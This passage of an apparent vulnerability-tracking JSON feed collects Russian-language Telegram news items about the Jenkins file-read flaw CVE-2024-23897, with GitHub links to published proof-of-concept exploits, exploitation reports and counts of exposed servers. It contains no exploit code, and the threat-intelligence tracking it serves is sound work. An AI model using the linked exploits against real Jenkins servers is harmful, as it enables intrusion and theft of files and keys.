\u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 Jenkins, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 \u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430 Jenkins, \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432 \u0446\u0435\u043b\u0438\u043a\u043e\u043c \u0438\u043b\u0438 \u0441 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f\u043c\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0435 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043a\u043b\u044e\u0447\u0438.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0431\u044b\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430 \u0432 Jenkins 2.442, LTS 2.426.3 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u0438 \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0447\u0435\u0441\u043a\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f, \u043f\u043e\u043a\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0435 \u0431\u0443\u0434\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u043e, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a CLI.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 JFrog Security \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u0434\u0432\u0443\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c (DoS \u0438 RCE) 35-\u043b\u0435\u0442\u043d\u0435\u0439 \u0434\u0430\u0432\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0441\u0440\u0435\u0434\u044b Linux.\n\nCVE-2023-43786 \u0438 CVE-2023-43787\u00a0(\u0441 \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438\u00a0CVSS 7.8) \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u0448\u0438\u0440\u043e\u043a\u043e \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0439 \u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 X.Org libX11, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 1989 \u0433\u043e\u0434\u0430, \u0438 \u043f\u0440\u0438\u0432\u043e\u0434\u044f\u0442 \u043a \u043e\u0442\u043a\u0430\u0437\u0443 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u043c\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043a\u043e\u0434\u0430.\n\n\u041f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 X11 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.", "creation_timestamp": "2024-01-26T11:00:06.000000Z"}, {"uuid": "09adab30-7f58-4cea-99a7-9b6420c86803", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/1138", "content": "https://github.com/ThatNotEasy/CVE-2024-23897\n\n- This repository contains a Python script that exploits a critical vulnerability (CVE-2024-23897) in Jenkins, leading to arbitrary file read and remote code execution (RCE). This vulnerability allows an unauthenticated attacker to execute arbitrary commands on the target Jenkins server, potentially compromising the entire system.", "creation_timestamp": "2024-02-19T14:12:41.000000Z"}, {"uuid": "677cea2a-9aed-4f3a-8324-81641b4fcc6c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "Telegram/yQPhCM7NHlk93b8kwonyhC_cOv6vfNy4r3qNRUt4fFYJRSc", "content": "", "creation_timestamp": "2024-03-30T06:57:05.000000Z"}, {"uuid": "83cefb99-a54c-4e47-b3e5-5b2a24cb1863", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "published-proof-of-concept", "source": "https://t.me/zero_day_uz/407", "content": "#Jenkins #RCE #CVE-2024-23897\n\nhttps://github.com/kohsuke/args4j\n\nhttps://github.com/binganao/CVE-2024-23897", "creation_timestamp": "2024-01-29T09:30:21.000000Z"}, {"uuid": "94402c88-825f-4b13-b3b6-d3c532c8f742", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/cyberden_team/493", "content": "\ud83d\udca5\u0421\u0430\u043c\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 CVE \u0437\u0430 \u044f\u043d\u0432\u0430\u0440\u044c 2024 \u0433\u043e\u0434\u0430\n\n\u0412 \u044d\u0442\u043e\u0439 \u043f\u043e\u0434\u0431\u043e\u0440\u043a\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b \u0441\u0430\u043c\u044b\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u0430 \u044f\u043d\u0432\u0430\u0440\u044c 2024 \u0433\u043e\u0434\u0430:\n\nCVE-2024-23897\nCVE-2024-0402 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.9\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-0204 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-0230 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a02.4\u00a0\u0431\u0430\u043b\u043b\u0430.\nCVE-2024-20253 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.9\u00a0\u0431\u0430\u043b\u043b\u0430.\nCVE-2024-20272 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a07.3\u00a0\u0431\u0430\u043b\u043b\u0430.\nCVE-2024-21591 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-0200 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-0507 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a08.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-21737 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a09.1\u00a0\u0431\u0430\u043b\u043b\u0430.\nCVE-2024-21672 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a08.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-21673 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a08.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-21674 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a07.5\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-22197 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a08.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.\nCVE-2024-22198 - \u041e\u0446\u0435\u043d\u043a\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u00a0\u0448\u043a\u0430\u043b\u0435 CVSS 3.1 \u2014\u00a08.8\u00a0\u0431\u0430\u043b\u043b\u043e\u0432.", "creation_timestamp": "2024-02-12T11:59:05.000000Z"}, {"uuid": "34c19e46-0b15-4d62-85ec-755e2000c9eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/true_secator/6041", "content": "\u0412\u043a\u0440\u0430\u0442\u0446\u0435 \u043f\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c \u0438 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c, \u043a\u043e\u0438\u0445 \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c \u043d\u0435 \u043c\u0430\u043b\u043e \u043d\u0430 \u043d\u0435\u0434\u0435\u043b\u0435.\n\nZoho \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0434\u0432\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438\u00a0\u0434\u043b\u044f \u0441\u0432\u043e\u0435\u0433\u043e \u041f\u041e ManageEngine \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0434\u0432\u0443\u0445 SQL-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432 Exchange Reporter Plus.\n\n\u041e\u0448\u0438\u0431\u043a\u0438 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u043a\u0430\u043a CVE-2024-38871 \u0438 CVE-2024-38872 (\u043e\u0431\u0435 \u0441 CVSS 8,3), \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u0435\u0449\u0435 \u043d\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438\u0441\u044c, \u0432\u043e \u0432\u0441\u044f\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043f\u043e\u043a\u0430.\n\n\u041c\u043d\u043e\u0433\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u043b\u044c\u043d\u0430\u044f Progress \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u0434\u043b\u044f \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u043c\u043d\u043e\u0433\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u043b\u044c\u043d\u043e\u0433\u043e MOVEit Transfer.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 CVE-2024-6576 \u0432 \u043c\u043e\u0434\u0443\u043b\u044c SFTP \u0438\u043c\u0435\u0435\u0442 CVSS 7.3 \u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0439 \u043e\u0431 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043d\u0435\u0442, \u043d\u043e \u0437\u043d\u0430\u044f MOVEit - \u043e\u0436\u0438\u0434\u0430\u0442\u044c \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e \u0441\u0442\u043e\u0438\u0442.\n\nSalt Security \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u043e XSS-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0441\u0435\u0440\u0432\u0438\u0441\u0435 Hotjar, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0433\u043b\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043e\u043d\u043b\u0430\u0439\u043d-\u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0441\u0430\u0439\u0442\u044b \u043c\u0438\u0440\u043e\u0432\u044b\u0445 \u0431\u0440\u0435\u043d\u0434\u043e\u0432, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Adobe, Microsoft, Panasonic, Columbia, RyanAir, Decathlon, T-Mobile, Nintendo \u0438 \u0434\u0440.\n\n\u0422\u0435\u043f\u0435\u0440\u044c \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CosmicSting Magento \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432. \n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0442\u0430\u043b\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e  \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0435\u0449\u0435 \u0432 \u043d\u0430\u0447\u0430\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430.\n\nCloudSEK \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c LFI \u0432 Jenkins, \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u043a\u0430\u043a CVE-2024-23897, \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432 Github.\n\nMicrosoft\u00a0\u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0430\u00a0\u043e \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0438 0-day VMware ESXi (CVE-2024-37085) \u0432 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 \u0430\u0442\u0430\u043a\u0430\u0445 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u043c\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a Akira \u0438 Black Basta.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f (CVE-2024-37085) \u043d\u0430\u0445\u043e\u0434\u0438\u043b\u0430\u0441\u044c \u0432 \u0438\u043d\u0442\u0435\u0433\u0440\u0430\u0446\u0438\u0438 ESXi Active Directory. \n\n\u041e\u043d\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u043b\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0438 \u0441\u043e\u0437\u0434\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439-\u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u0432 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u0445 ESXi, \u043f\u0440\u0438\u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u043d\u044b\u0445 \u043a \u0434\u043e\u043c\u0435\u043d\u0443.", "creation_timestamp": "2024-07-31T15:33:16.000000Z"}, {"uuid": "59595a44-6449-4cb6-9903-11a7350ab3e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "exploited", "source": "https://t.me/true_secator/5352", "content": "\u041f\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 Jenkins RCE \u0432\u0441\u0435 \u0435\u0449\u0435 \u0445\u0443\u0436\u0435, \u0447\u0435\u043c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u043d\u0435\u0435 \u0441 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435\u043c \u0440\u0435\u0430\u043b\u044c\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0438\u0445 \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 PoC-\u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432 \u0434\u043b\u044f CVE-2024-23897, \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0447\u0442\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\u043d\u043e\u0439 \u0441\u0442\u0440\u043e\u043a\u0438 (CLI).\n\n\u0412\u0441\u0435 \u044d\u0442\u043e \u043f\u0440\u0438\u0432\u0435\u043b\u043e \u043a \u043d\u0430\u0447\u0430\u043b\u0443 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u044e\u0449\u0438\u0435 \u0437\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0430\u043c\u0438 \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0438.\n\n\u0418, \u043f\u043e \u0432\u0441\u0435\u0439 \u0432\u0438\u0434\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0431\u0435\u0449\u0430\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u0435\u0441\u044c\u043c\u0430 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0438\u0432\u043d\u043e\u0439, \u0432\u0435\u0434\u044c, \u043a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0432 Shadowserver, \u0431\u043e\u043b\u0435\u0435 45 \u0442\u044b\u0441\u044f\u0447 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b\u0445 \u0432 \u0441\u0435\u0442\u0438 \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 Jenkins \u0443\u044f\u0437\u0432\u0438\u043c\u044b \u043a CVE-2024-23897, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u0443\u044e \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u044c \u0430\u0442\u0430\u043a\u0438.\n\n\u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u0432 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u041a\u0438\u0442\u0430\u0435 (12 000) \u0438 \u0421\u0428\u0410 (11 830), \u0437\u0430 \u043a\u043e\u0442\u043e\u0440\u044b\u043c\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u0413\u0435\u0440\u043c\u0430\u043d\u0438\u044f (3 060), \u0418\u043d\u0434\u0438\u044f (2 681), \u0424\u0440\u0430\u043d\u0446\u0438\u044f (1 431) \u0438 \u0412\u0435\u043b\u0438\u043a\u043e\u0431\u0440\u0438\u0442\u0430\u043d\u0438\u044f (1 029).\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432 \u0420\u043e\u0441\u0441\u0438\u0438 \u0438\u0445 \u0442\u043e\u0436\u0435 \u043d\u0435\u043c\u0430\u043b\u043e \u0438 \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 - 939.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c Jenkins \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f, \u0441\u043b\u0435\u0434\u0443\u044f \u0432\u0441\u0435\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u044f\u043c \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u044e \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Jenkins.", "creation_timestamp": "2024-01-30T16:30:05.000000Z"}, {"uuid": "383ddf9e-3193-40e2-b032-ba7263bb0669", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-23897", "type": "seen", "source": "https://t.me/ctinow/211190", "content": "https://ift.tt/nhrQ4q8\nJenkins Args4j CVE-2024-23897: Files 